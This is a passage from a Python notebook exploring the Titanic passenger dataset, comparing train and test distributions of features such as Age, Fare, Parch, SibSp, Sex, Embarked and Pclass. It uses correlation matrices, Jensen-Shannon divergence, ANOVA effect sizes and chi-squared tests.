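print('PCC(Parch, SibSp) on the train set:', train_df['Parch'].corr(train_df['SibSp'], method='pearson'))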
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,6))
corr_train = train_df[['Age', 'Fare', 'Parch', 'SibSp', 'Survived']].corr()
corr_test = test_df[['Age', 'Fare', 'Parch', 'SibSp']].corr()
# Generate masks for the upper triangles
mask_train = np.zeros_like(corr_train, dtype=np.bool)
mask_train[np.triu_indices_from(mask_train)] = True
mask_test = np.zeros_like(corr_test, dtype=np.bool)
mask_test[np.triu_indices_from(mask_test)] = True
# Generate a custom diverging colormap
cmap = sns.diverging_palette(220, 10, as_cmap=True)
# Draw the train set heatmap with the mask and correct aspect ratio
sns.heatmap(corr_train, ax=ax1, mask=mask_train, cmap=cmap, vmax=.5, center=0, square=True,
linewidths=.5, cbar_kws={"shrink": .5}, annot=True, fmt='.2f')
ax1.set_title('Pearson\'s correlation matrix of train set')
# Draw the test heatmap with the mask and correct aspect ratio
sns.heatmap(corr_test, ax=ax2, mask=mask_test, cmap=cmap, vmax=.5, center=0, square=True,
linewidths=.5, cbar_kws={"shrink": .5}, annot=True, fmt='.2f')
ax2.set_title('Pearson\'s correlation matrix of test set')
# Three remarks:
# * it seems that `Fare` has the strongest linear correlation with `Survived`, making it a strong feature;
# * `Parch` and `SibSp` show a potentially strong linear correlation, so it might be a good idea to combine those features;
# * except with `Fare`, the `Age` feature shows different correlation coefficients between the train set and the test set.
#
# Because of that last remark, we will try to get more insights by computing the **Jensen-Shannon divergence** between the distributions of the train set and the test set. It is a measure of similarity between two probability distributions based on the **Kullback-Leibler divergence** well-known in information theory.
#
# It is defined as:
#
# $${{\rm {JSD}}}(P\parallel Q)={\frac {1}{2}}D_{\mathrm {KL}}(P\parallel M)+{\frac {1}{2}}D_{\mathrm {KL}}(Q\parallel M)$$
#
# where $M={\frac {1}{2}}(P+Q)$ and $D_{\mathrm {KL}}$ is the KL divergence.
# In[ ]:
from scipy.stats import entropy
from numpy.linalg import norm
def JSD(P, Q, n_iter=1000):
"""
Computes the Jensen-Shannon divergence between two probability distributions of different sizes.
:param P: distribution P
:param Q: distribution Q
:param n_iter: number of iterations
    :return: list of Jensen-Shannon divergence estimates (one per subsampling iteration)
"""
size = min(len(P),len(Q))
results = []
for _ in range(n_iter):
        # Subsample from the original arrays on each iteration; reassigning P and Q
        # would shrink them after the first pass and freeze the subsample
        _P = np.random.choice(P, size=size, replace=False)
        _Q = np.random.choice(Q, size=size, replace=False)
        _P = _P / norm(_P, ord=1)
        _Q = _Q / norm(_Q, ord=1)
_M = 0.5 * (_P + _Q)
results.append(0.5 * (entropy(_P, _M) + entropy(_Q, _M)))
return results
# ### Univariate analysis
# Let's first analyze features individually.
#
# #### Age
# In[ ]:
# Age vs Survived
g = sns.FacetGrid(train_df, col='Survived', size=4, aspect=2)
g = g.map(sns.distplot, 'Age', color='#D66A84')
# Even though it just looks like a sum of Gaussian distributions, we can clearly observe the impact of `Age` on `Survival`: very young passengers, and those in the likely-parent age range, had a better chance of surviving. (Remember that about 20% of this column is missing.)
#
# Let's now see how the test set is distributed compared to the train set.
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.distplot(train_df['Age'].dropna(), ax=ax1, color='#D66A84')
ax1.set_title('Train set')
sns.distplot(test_df['Age'].dropna(), ax=ax2, color='#D66A84')
ax2.set_title('Test set')
# We see that the `Age` feature alone won't be of great help in predicting survival on the test set, since most of it is composed of 20-30 year-old passengers, a range with roughly 50/50 survival odds.
#
# Let's compute the JS divergence for `Age`, we will compare this value later with other features.
# In[ ]:
age_jsd = JSD(train_df['Age'].dropna().values, test_df['Age'].dropna().values)
print('Jensen-Shannon divergence of Age:', np.mean(age_jsd))
print('Standard deviation:', np.std(age_jsd))
# **Conclusion:** to use `Age`, we will have to impute 20% missing data (not that easy), create bins to avoid overfitting and/or mix it with other features.
# #### Fare
# In[ ]:
# Fare vs Survived
g = sns.FacetGrid(train_df, col='Survived', palette=palette, size=4, aspect=2)
g = g.map(sns.distplot, 'Fare', color='#25627D')
# In[ ]:
fig, ax = plt.subplots(figsize=(18,4))
g = sns.distplot(train_df['Fare'], ax=ax, color='#25627D', label='Skewness : %.2f'%(train_df['Fare'].skew()))
g = g.legend(loc='best')
# The `Fare` feature is right-skewed; if we want to make discriminant bins, we'll have to address this concern later.
#
# The skewness of a random variable $X$ is the third standardized moment $\gamma _{1}$, defined as:
#
# $${\displaystyle \gamma _{1}=\operatorname {E} \left[\left({\frac {X-\mu }{\sigma }}\right)^{3}\right]={\frac {\mu _{3}}{\sigma ^{3}}}={\frac {\operatorname {E} \left[(X-\mu )^{3}\right]}{\ \ \ (\operatorname {E} \left[(X-\mu )^{2}\right])^{3/2}}}={\frac {\kappa _{3}}{\kappa _{2}^{3/2}}}}$$
#
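# As a quick illustration (not part of the original pipeline), a log transform tames the right tail; `np.log1p` is assumed here instead of the plain `np.log` applied later, to sidestep zero fares:

# In[ ]:


print('Raw Fare skewness: %.2f' % train_df['Fare'].skew())
print('Log Fare skewness: %.2f' % np.log1p(train_df['Fare']).skew())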
# Let's now see how the test set is distributed compared to the train set.
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.distplot(train_df['Fare'].dropna(), ax=ax1, color='#25627D')
ax1.set_title('Train set')
sns.distplot(test_df['Fare'].dropna(), ax=ax2, color='#25627D')
ax2.set_title('Test set')
# `Fare` looks almost evenly distributed between the train set and the test set.
#
# Let's compute the JS divergence for `Fare`, we will compare this value later with other features.
# In[ ]:
fare_jsd = JSD(train_df['Fare'].dropna().values, test_df['Fare'].dropna().values)
print('Jensen-Shannon divergence of Fare:', np.mean(fare_jsd))
print('Standard deviation:', np.std(fare_jsd))
# **Conclusion:** to use `Fare`, we will have to impute 1 missing value, fix the tailed distribution and create bins to avoid overfitting and/or mix it with other features.
# #### Parch
# In[ ]:
palette6 = ["#F6B5A4", "#EB7590", "#C8488A", "#872E93", "#581D7F", "#3A1353"]
# Parch vs Survived
g = sns.catplot(x='Parch', y='Survived', saturation=5, height=4, aspect=4, data=train_df, kind='bar', palette=palette6)
g.despine(left=True)
g = g.set_ylabels("Survival probability")
# At first glance, we can say that passengers who happened to have a relatively small family on the Titanic were more likely to survive. We have to stay careful though, because `Parch` values of 3 and 5 come with high standard deviations.
#
# Let's now see how the test set is distributed compared to the training set.
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.distplot(train_df['Parch'], ax=ax1, color='#84B044')
ax1.set_title('Train set')
sns.distplot(test_df['Parch'], ax=ax2, color='#84B044')
ax2.set_title('Test set')
# `Parch` looks evenly distributed between both sets at first sight, but that is not quite the case.
#
# Let's compute the JS divergence for `Parch`, we will compare this value later with other features.
# In[ ]:
parch_jsd = JSD(train_df['Parch'].values, test_df['Parch'].values)
print('Jensen-Shannon divergence of Parch:', np.mean(parch_jsd))
print('Standard deviation:', np.std(parch_jsd))
# **Conclusion:** we can use `Parch` as is or mix it with other features.
# #### SibSp
# In[ ]:
palette7 = ["#F7BBA6", "#ED8495", "#E05286", "#A73B8F", "#6F2597", "#511B75", "#37114E"]
# SibSp feature vs Survived
g = sns.catplot(x='SibSp', y='Survived', saturation=5, height=4, aspect=4, data=train_df, kind='bar', palette=palette7)
g.despine(left=True)
g = g.set_ylabels("Survival probability")
# It seems that passengers travelling alone or with one or two siblings/spouses had a better chance of surviving.
#
# Let's now see how the test set is distributed compared to the training set.
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.distplot(train_df['SibSp'], ax=ax1, color='#E76C5D')
ax1.set_title('Train set')
sns.distplot(test_df['SibSp'], ax=ax2, color='#E76C5D')
ax2.set_title('Test set')
# `SibSp` looks evenly distributed between both sets at first sight, but that is not quite the case.
#
# Let's compute the JS divergence for `SibSp`, we will compare this value later with other features.
# In[ ]:
sibsp_jsd = JSD(train_df['SibSp'].values, test_df['SibSp'].values)
print('Jensen-Shannon divergence of SibSp:', np.mean(sibsp_jsd))
print('Standard deviation:', np.std(sibsp_jsd))
# **Conclusion:** we can use `SibSp` as is or mix it with other features.
# #### Differences between the distributions of the train set and the test set
# By looking at the JS divergence, we can tell how the distributions of individual features differ between the train set and the test set. Keep in mind that it is OK to observe some divergence.
# In[ ]:
palette4 = ["#F19A9B", "#D54D88", "#7B2A95", "#461765"]
fig, ax = plt.subplots(figsize=(18,4))
jsd = pd.DataFrame(np.column_stack([age_jsd, fare_jsd, parch_jsd, sibsp_jsd]), columns=['Age', 'Fare', 'Parch', 'SibSp'])
sns.boxplot(data=jsd, ax=ax, orient="h", linewidth=1, saturation=5, palette=palette4)
ax.set_title('Jensen-Shannon divergences of numerical features')
# ### Bivariate analysis
# Let's then see if there is an impact of a feature on another.
#
# #### Age vs Fare
# In[ ]:
plt.figure(figsize=(18, 4))
plt.scatter(train_df['Age'], train_df['Fare'], c=train_df['Survived'].values, cmap='cool')
plt.xlabel('Age')
plt.ylabel('Fare')
plt.title('Age vs Fare')
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.regplot(x='Age', y='Fare', ax=ax1, data=train_df)
ax1.set_title('Train set')
sns.regplot(x='Age', y='Fare', ax=ax2, data=test_df)
ax2.set_title('Test set')
# In[ ]:
print('PCC for the train set: ', corr_train['Age']['Fare'])
print('PCC for the test set: ', corr_test['Age']['Fare'])
# **Conclusion:** `Age` and `Fare` tend to be much more linearly correlated on the test set than on the train set (remember, though, that the `Fare` distribution is skewed).
# #### Age vs Parch
# In[ ]:
plt.figure(figsize=(18, 4))
plt.scatter(train_df['Age'], train_df['Parch'], c=train_df['Survived'].values, cmap='cool')
plt.xlabel('Age')
plt.ylabel('Parch')
plt.title('Age vs Parch')
# In[ ]:
palette8 = ["#F8C1A8", "#EF9198", "#E8608A", "#C0458A", "#8F3192", "#63218F", "#4B186C", "#33104A"]
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Age', x='Parch', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette7)
ax1.set_title('Train set')
sns.boxplot(y='Age', x='Parch', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette8)
ax2.set_title('Test set')
# In[ ]:
print('PCC for the train set: ', corr_train['Age']['Parch'])
print('PCC for the test set: ', corr_test['Age']['Parch'])
# **Conclusion:** there are noticeable differences in the distributions of those features between the train set and the test set. This can be stabilized by making age bins though.
# #### Fare vs Parch
# In[ ]:
plt.figure(figsize=(18, 4))
plt.scatter(train_df['Fare'], train_df['Parch'], c=train_df['Survived'].values, cmap='cool')
plt.xlabel('Fare')
plt.ylabel('Parch')
plt.title('Fare vs Parch')
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Fare', x='Parch', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette7)
ax1.set_title('Train set')
sns.boxplot(y='Fare', x='Parch', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette8)
ax2.set_title('Test set')
# In[ ]:
print('PCC for the train set: ', corr_train['Fare']['Parch'])
print('PCC for the test set: ', corr_test['Fare']['Parch'])
# **Conclusion:** although they have similar correlation coefficients, distributions differ between both sets.
# #### Fare vs SibSp
# In[ ]:
plt.figure(figsize=(18, 4))
plt.scatter(train_df['Fare'], train_df['SibSp'], c=train_df['Survived'].values, cmap='cool')
plt.xlabel('Fare')
plt.ylabel('SibSp')
plt.title('Fare vs SibSp')
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Fare', x='SibSp', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette7)
ax1.set_title('Train set')
sns.boxplot(y='Fare', x='SibSp', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette8)
ax2.set_title('Test set')
# In[ ]:
print('PCC for the train set: ', corr_train['Fare']['SibSp'])
print('PCC for the test set: ', corr_test['Fare']['SibSp'])
# **Conclusion:** although they have similar correlation coefficients, distributions differ between both sets.
# #### Parch vs SibSp
# In[ ]:
plt.figure(figsize=(18, 4))
plt.scatter(train_df['Parch'], train_df['SibSp'], c=train_df['Survived'].values, cmap='cool')
plt.xlabel('Parch')
plt.ylabel('SibSp')
plt.title('Parch vs SibSp')
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Parch', x='SibSp', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette7)
ax1.set_title('Train set')
sns.boxplot(y='Parch', x='SibSp', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette8)
ax2.set_title('Test set')
# In[ ]:
print('PCC for the train set: ', corr_train['Parch']['SibSp'])
print('PCC for the test set: ', corr_test['Parch']['SibSp'])
# **Conclusion:** distributions look quite the same with strong correlation coefficients, we will combine them later.
# ### 3.6 Exploring categorical features
#
# ### Univariate analysis
#
# Let's first analyze features individually.
#
# #### Embarked
# In[ ]:
palette3 = ["#EE8695", "#A73B8F", "#501B73"]
# Embarked feature vs Survived
g = sns.catplot(x='Embarked', y='Survived', saturation=5, height=4, aspect=4, data=train_df,
kind='bar', palette=palette3)
g.despine(left=True)
g = g.set_ylabels('Survival probability')
# It's curious that the port of embarkation has an influence on `Survival`; this must be related to another feature, and we'll dive in with bivariate analysis.
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
train_df['Embarked'].value_counts().plot(kind='barh', ax=ax1)
ax1.set_title('Train set')
test_df['Embarked'].value_counts().plot(kind='barh', ax=ax2)
ax2.set_title('Test set')
# Quite similar distributions between the train set and the test set as we can see.
#
# **Conclusion:** we can use `Embarked` as is or mix it with other features.
# #### Sex
# Everyone has watched *Titanic*; we all know that women were more likely to survive this disaster.
# In[ ]:
palette2 = ["#EE8695", "#A73B8F"]
# Sex feature vs Survived
g = sns.catplot(x='Sex', y='Survived', saturation=5, height=4, aspect=4, data=train_df,
kind='bar', palette=palette2)
g.despine(left=True)
g = g.set_ylabels('Survival probability')
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
train_df['Sex'].value_counts().plot(kind='barh', ax=ax1)
ax1.set_title('Train set')
test_df['Sex'].value_counts().plot(kind='barh', ax=ax2)
ax2.set_title('Test set')
# Quite similar distributions between the train set and the test set as we can see.
#
# **Conclusion:** we can use `Sex` as is or mix it with other features.
# #### Pclass
# In[ ]:
# Pclass feature vs Survived
g = sns.catplot(x='Pclass', y='Survived', saturation=5, height=4, aspect=4, data=train_df,
kind='bar', palette=palette3)
g.despine(left=True)
g = g.set_ylabels('Survival probability')
# Wealthier passengers had more influence on the Titanic; it appears that they were more likely to find a place on a lifeboat.
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
train_df['Pclass'].value_counts().plot(kind='barh', ax=ax1)
ax1.set_title('Train set')
test_df['Pclass'].value_counts().plot(kind='barh', ax=ax2)
ax2.set_title('Test set')
# Quite similar distributions between the train set and the test set as we can see.
#
# **Conclusion:** we can use `Pclass` as is or mix it with other features.
# ### Bivariate analysis
# Let's then see if there is an impact of a feature on another.
#
# #### Continuous and categorical variables
#
# When dealing with continuous and categorical variables, we can look at statistical significance through variance analysis (**ANOVA**).
#
# If we denote by $k_i$ the $i$th value of the continuous variable in a group, $n$ the number of passengers in each group, $T$ the sum of the continuous variable's values over all passengers and $N$ the total number of passengers, we can define the *Sum of Squares Between* $SS_{between}$:
#
# $$SS_{between} = \frac{\sum(\sum k_i)^2}{n} - \frac{T^2}{N}$$
#
# If we denote by $Y$ a value of the continuous variable, we can define the *Sum of Squares Total* $SS_{total}$:
#
# $$SS_{total} = \sum Y^2 - \frac{T^2}{N}$$
#
# We then have access to the *effect size* $\eta^2$, which tells us how much the group has influenced the variable:
#
# $$\eta^2 = \frac{SS_{between}}{SS_{total}}$$
#
# For the value of $\eta^2$, we will refer to Cohen's guidelines, which are as follows:
# * Small effect: 0.01
# * Medium effect: 0.059
# * Large effect: 0.138
# In[ ]:
import statsmodels.api as sm
from statsmodels.formula.api import ols
def compute_anova(dataset, group, weight):
"""
Computes the effect size through ANOVA.
:param dataset: pandas DataFrame
:param group: categorical feature
:param weight: continuous feature
:return: effect size
"""
mod = ols(weight + ' ~ ' + group, data=dataset).fit()
aov_table = sm.stats.anova_lm(mod, typ=2)
esq_sm = aov_table['sum_sq'][0]/(aov_table['sum_sq'][0]+aov_table['sum_sq'][1])
return esq_sm
# #### Categorical and categorical variables
# When dealing with two categorical (or discrete) variables, we can look at statistical independence through the $\chi^2$ test.
#
# In its general statement, if there are $r$ rows and $c$ columns in the dataset, the *theoretical frequency* for a value, given the hypothesis of independence, is:
#
# $$E_{{i,j}}=Np_{{i\cdot }}p_{{\cdot j}}$$
#
# where $N$ is the total sample size, and:
#
# $$p_{{i\cdot }}={\frac {O_{{i\cdot }}}{N}}=\sum _{{j=1}}^{c}{\frac {O_{{i,j}}}{N}}$$
#
# is the fraction of observations of type $i$ ignoring the column attribute, and:
#
# $${\displaystyle p_{\cdot j}={\frac {O_{\cdot j}}{N}}=\sum _{i=1}^{r}{\frac {O_{i,j}}{N}}}$$
#
# is the fraction of observations of type $j$ ignoring the row attribute. The term *frequencies* refers to absolute numbers rather than already normalised values.
#
# The value of the test-statistic is:
#
# $$\chi ^{2}=\sum _{{i=1}}^{{r}}\sum _{{j=1}}^{{c}}{(O_{{i,j}}-E_{{i,j}})^{2} \over E_{{i,j}}} = N\sum _{{i,j}}p_{{i\cdot }}p_{{\cdot j}}\left({\frac {(O_{{i,j}}/N)-p_{{i\cdot }}p_{{\cdot j}}}{p_{{i\cdot }}p_{{\cdot j}}}}\right)^{2}$$
#
# The null hypothesis $H_0$ is that the two variables are independent. We will then also look at the *p-value*. ($H_0$ rejected if $p \leq 0.05$)
# In[ ]:
from scipy.stats import chi2_contingency
def chisq(dataset, c1, c2):
"""
Performs the Chi squared independence test.
:param dataset: pandas DataFrame
    :param c1: first categorical/discrete feature
    :param c2: second categorical/discrete feature
    :return: None (prints the Chi^2 statistic, p-value and degrees of freedom)
"""
groupsizes = dataset.groupby([c1, c2]).size()
ctsum = groupsizes.unstack(c1)
result = chi2_contingency(ctsum.fillna(0))
print('Chi^2:', result[0])
print('p-value:', result[1])
print('Degrees of freedom:', result[2])
# #### Embarked vs Age
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Age', x='Embarked', ax=ax1, data=train_df, linewidth=1, saturation=5, order=['S', 'C', 'Q'], palette=palette3)
ax1.set_title('Train set')
sns.boxplot(y='Age', x='Embarked', ax=ax2, data=test_df, linewidth=1, saturation=5, order=['S', 'C', 'Q'], palette=palette3)
ax2.set_title('Test set')
# In[ ]:
train_esq_sm = compute_anova(train_df, 'Embarked', 'Age')
test_esq_sm = compute_anova(test_df, 'Embarked', 'Age')
print('ANOVA 1-way for the train set: ', train_esq_sm)
print('ANOVA 1-way for the test set: ', test_esq_sm)
# For the **train set**, the effect of `Embarked` on `Age` is **low** (0.0019).
#
# For the **test set**, the effect of `Embarked` on `Age` is **low/medium** (0.0327).
#
# **Conclusion:** the effect of `Embarked` on `Age` differs by about **3%** between the two sets.
# #### Embarked vs Fare
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Fare', x='Embarked', ax=ax1, data=train_df, linewidth=1, saturation=5, order=['S', 'C', 'Q'], palette=palette3)
ax1.set_title('Train set')
sns.boxplot(y='Fare', x='Embarked', ax=ax2, data=test_df, linewidth=1, saturation=5, order=['S', 'C', 'Q'], palette=palette3)
ax2.set_title('Test set')
# In[ ]:
train_esq_sm = compute_anova(train_df, 'Embarked', 'Fare')
test_esq_sm = compute_anova(test_df, 'Embarked', 'Fare')
print('ANOVA 1-way for the train set: ', train_esq_sm)
print('ANOVA 1-way for the test set: ', test_esq_sm)
# For the **train set**, the effect of `Embarked` on `Fare` is **medium/high** (0.0823).
#
# For the **test set**, the effect of `Embarked` on `Fare` is **medium/high** (0.1064).
#
# **Conclusion:** the effect of `Embarked` on `Fare` differs by about **2.4%** between the two sets.
# #### Embarked vs Parch
# Let's first write a quick function to plot the proportion of `Embarked` by another discrete variable.
# In[ ]:
def plot_embarked_variable(dataset, variable):
"""
Plots the proportion of variable values per Embarked value of a dataset.
:param dataset: pandas DataFrame
:param variable: variable to plot
"""
s_variable_index = dataset.groupby(['Embarked', variable]).size()['S'].index.values
c_variable_index = dataset.groupby(['Embarked', variable]).size()['C'].index.values
q_variable_index = dataset.groupby(['Embarked', variable]).size()['Q'].index.values
index = list(set().union(s_variable_index,c_variable_index,q_variable_index))
raw_s_variable = dataset.groupby(['Embarked', variable]).size()['S']
raw_c_variable = dataset.groupby(['Embarked', variable]).size()['C']
raw_q_variable = dataset.groupby(['Embarked', variable]).size()['Q']
s_variable = []
c_variable = []
q_variable = []
for i in range(max(index) + 1):
s_variable.append(raw_s_variable[i] if i in s_variable_index else 0)
c_variable.append(raw_c_variable[i] if i in c_variable_index else 0)
q_variable.append(raw_q_variable[i] if i in q_variable_index else 0)
percent_s_variable = [s_variable[i]/(s_variable[i] + c_variable[i] + q_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
percent_c_variable = [c_variable[i]/(s_variable[i] + c_variable[i] + q_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
percent_q_variable = [q_variable[i]/(s_variable[i] + c_variable[i] + q_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
r = list(range(max(index) + 1))
bars = [sum(x) for x in zip(percent_s_variable, percent_c_variable)]
fig, axs = plt.subplots(1,1,figsize=(18,4))
plt.bar(r, percent_s_variable, color='#08c299')
plt.bar(r, percent_c_variable, bottom=percent_s_variable, linewidth=0, color='#97de95')
plt.bar(r, percent_q_variable, bottom=bars, linewidth=0, color='#fce8aa')
plt.xticks(r, r)
plt.title('Proportion of Embarked values by ' + variable)
axs.legend(labels=['S', 'C', 'Q'])
axs.yaxis.set_major_formatter(PercentFormatter(xmax=1))
# Train set:
# In[ ]:
plot_embarked_variable(train_df, 'Parch')
chisq(train_df, 'Embarked', 'Parch')
# Test set:
# In[ ]:
plot_embarked_variable(test_df, 'Parch')
chisq(test_df, 'Embarked', 'Parch')
# **Conclusion:** it is worth noting that `Embarked` and `Parch` **are not** considered independent on the test set but they **are** on the train set.
# #### Embarked vs SibSp
# Train set:
# In[ ]:
plot_embarked_variable(train_df, 'SibSp')
chisq(train_df, 'Embarked', 'SibSp')
# Test set:
# In[ ]:
plot_embarked_variable(test_df, 'SibSp')
chisq(test_df, 'Embarked', 'SibSp')
# **Conclusion:** `Embarked` and `SibSp` are not considered independent on the train set but they are on the test set.
# #### Embarked vs Sex
# In[ ]:
tmp_train_df = train_df.copy(deep=True)
tmp_train_df['Sex'].replace(['male', 'female'], [0,1], inplace=True)
plot_embarked_variable(tmp_train_df, 'Sex')
chisq(tmp_train_df, 'Embarked', 'Sex')
# In[ ]:
tmp_test_df = test_df.copy(deep=True)
tmp_test_df['Sex'].replace(['male', 'female'], [0,1], inplace=True)
plot_embarked_variable(tmp_test_df, 'Sex')
chisq(tmp_test_df, 'Embarked', 'Sex')
# It appears that on both sets, the proportion of males is higher among passengers who embarked at Southampton (S), thus influencing `Survival`.
#
# **Conclusion:** `Embarked` and `Sex` **are not** considered independent both on the train set and test set.
# #### Embarked vs Pclass
# Train set:
# In[ ]:
plot_embarked_variable(train_df, 'Pclass')
chisq(train_df, 'Embarked', 'Pclass')
# Test set:
# In[ ]:
plot_embarked_variable(test_df, 'Pclass')
chisq(test_df, 'Embarked', 'Pclass')
# It appears that the proportion of wealthy people is higher from Cherbourg (C), thus influencing `Survival`.
#
# **Conclusion:** `Embarked` and `Pclass` are considered **strongly dependent** both on the train set and test set.
# #### Sex vs Age
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Age', x='Sex', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette2)
ax1.set_title('Train set')
sns.boxplot(y='Age', x='Sex', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette2)
ax2.set_title('Test set')
# In[ ]:
train_esq_sm = compute_anova(train_df, 'Sex', 'Age')
test_esq_sm = compute_anova(test_df, 'Sex', 'Age')
print('ANOVA 1-way for the train set: ', train_esq_sm)
print('ANOVA 1-way for the test set: ', test_esq_sm)
# For the **train set**, the effect of `Sex` on `Age` is **low** (0.0086).
#
# For the **test set**, the effect of `Sex` on `Age` is **low** (1.6084e-10).
#
# **Conclusion:** the effect of `Sex` on `Age` differs by less than **1%** between the two sets.
# #### Sex vs Fare
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Fare', x='Sex', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette2)
ax1.set_title('Train set')
sns.boxplot(y='Fare', x='Sex', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette2)
ax2.set_title('Test set')
# In[ ]:
train_esq_sm = compute_anova(train_df, 'Sex', 'Fare')
test_esq_sm = compute_anova(test_df, 'Sex', 'Fare')
print('ANOVA 1-way for the train set: ', train_esq_sm)
print('ANOVA 1-way for the test set: ', test_esq_sm)
# For the **train set**, the effect of `Sex` on `Fare` is **low/medium** (0.0332).
#
# For the **test set**, the effect of `Sex` on `Fare` is **low/medium** (0.0367).
#
# **Conclusion:** the effect of `Sex` on `Fare` differs by less than **1%** between the two sets.
# #### Sex vs Parch
# Let's first write a quick function to plot the proportion of `Sex` by another discrete variable.
# In[ ]:
def plot_sex_variable(dataset, variable):
"""
Plots the proportion of variable values per Sex value of a dataset.
:param dataset: pandas DataFrame
:param variable: variable to plot
"""
male_variable_index = dataset.groupby(['Sex', variable]).size()['male'].index.values
female_variable_index = dataset.groupby(['Sex', variable]).size()['female'].index.values
index = list(set().union(male_variable_index, female_variable_index))
raw_male_variable = dataset.groupby(['Sex', variable]).size()['male']
raw_female_variable = dataset.groupby(['Sex', variable]).size()['female']
male_variable = []
female_variable = []
for i in range(max(index) + 1):
male_variable.append(raw_male_variable[i] if i in male_variable_index else 0)
female_variable.append(raw_female_variable[i] if i in female_variable_index else 0)
percent_male_variable = [male_variable[i]/(male_variable[i] + female_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
percent_female_variable = [female_variable[i]/(male_variable[i] + female_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
r = list(range(max(index) + 1))
fig, axs = plt.subplots(1,1,figsize=(18,4))
plt.bar(r, percent_male_variable, color='#ce2525')
plt.bar(r, percent_female_variable, bottom=percent_male_variable, linewidth=0, color='#ff6600')
plt.xticks(r, r)
plt.title('Proportion of Sex values by ' + variable)
axs.legend(labels=['male', 'female'])
axs.yaxis.set_major_formatter(PercentFormatter(xmax=1))
# Train set:
# In[ ]:
plot_sex_variable(train_df, 'Parch')
chisq(train_df, 'Sex', 'Parch')
# Test set:
# In[ ]:
plot_sex_variable(test_df, 'Parch')
chisq(test_df, 'Sex', 'Parch')
# **Conclusion:** `Sex` and `Parch` are considered **strongly dependent** both on the train set and test set.
# #### Sex vs SibSp
# Train set:
# In[ ]:
plot_sex_variable(train_df, 'SibSp')
chisq(train_df, 'Sex', 'SibSp')
# Test set:
# In[ ]:
plot_sex_variable(test_df, 'SibSp')
chisq(test_df, 'Sex', 'SibSp')
# **Conclusion:** `Sex` and `SibSp` are considered **strongly dependent** both on the train set and test set.
# #### Sex vs Pclass
# Train set:
# In[ ]:
plot_sex_variable(train_df, 'Pclass')
chisq(train_df, 'Sex', 'Pclass')
# Test set:
# In[ ]:
plot_sex_variable(test_df, 'Pclass')
chisq(test_df, 'Sex', 'Pclass')
# **Conclusion:** `Sex` and `Pclass` are considered **strongly dependent** both on the train set and test set.
# #### Pclass vs Age
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Age', x='Pclass', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette3)
ax1.set_title('Train set')
sns.boxplot(y='Age', x='Pclass', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette3)
ax2.set_title('Test set')
# In[ ]:
# compute_anova expects (dataset, group, weight): the categorical Pclass is the group
train_esq_sm = compute_anova(train_df, 'Pclass', 'Age')
test_esq_sm = compute_anova(test_df, 'Pclass', 'Age')
print('ANOVA 1-way for the train set: ', train_esq_sm)
print('ANOVA 1-way for the test set: ', test_esq_sm)
# For the **train set**, the effect of `Pclass` on `Age` is **medium/high** (0.1363).
#
# For the **test set**, the effect of `Pclass` on `Age` is **high** (0.2422).
#
# **Conclusion:** the effect of `Pclass` on `Age` differs by about **11%** between the two sets.
# #### Pclass vs Fare
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Fare', x='Pclass', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette3)
ax1.set_title('Train set')
sns.boxplot(y='Fare', x='Pclass', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette3)
ax2.set_title('Test set')
# In[ ]:
# compute_anova expects (dataset, group, weight): the categorical Pclass is the group
train_esq_sm = compute_anova(train_df, 'Pclass', 'Fare')
test_esq_sm = compute_anova(test_df, 'Pclass', 'Fare')
print('ANOVA 1-way for the train set: ', train_esq_sm)
print('ANOVA 1-way for the test set: ', test_esq_sm)
# For the **train set**, the effect of `Pclass` on `Fare` is **high** (0.3019).
#
